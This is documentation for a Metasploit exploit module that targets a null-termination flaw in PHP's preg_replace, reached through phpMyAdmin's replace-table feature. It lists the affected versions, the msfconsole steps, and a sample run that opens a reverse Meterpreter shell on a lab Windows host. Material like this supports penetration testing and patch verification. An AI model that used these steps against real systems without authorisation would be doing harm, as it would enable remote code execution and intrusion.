## Description

This module exploits a vulnerability in a PHP's `preg_replace()` function
that is used by phpMyAdmin's replace table feature.


## Vulnerable Application

PHP versions before 5.4.6 allow null termination of the `preg_replace` string parameter.

phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7),
and 4.0.x versions (prior to 4.0.10.16) are affected.


## Options

**DATABASE**
This option specifies the database the module will use
when creating a new table as part of the exploit.


## Verification Steps

- [ ] Install vulnerable phpMyAdmin application
- [ ] Create database through phpMyAdmin application
- [ ] `./msfconsole`
- [ ] `use exploit/multi/http/phpmyadmin_null_termination_exec`
- [ ] `set USERNAME <username>`
- [ ] `set PASSWORD <password>`
- [ ] `set DATABASE <database>`
- [ ] `set rhost <rhost>`
- [ ] `run`


## Scenarios

### Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8

```
msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
database => <database>
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Sleeping before handling stage...
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500
[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'

meterpreter > sysinfo
Computer    : WIN-V438RLMESAE
OS          : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows
```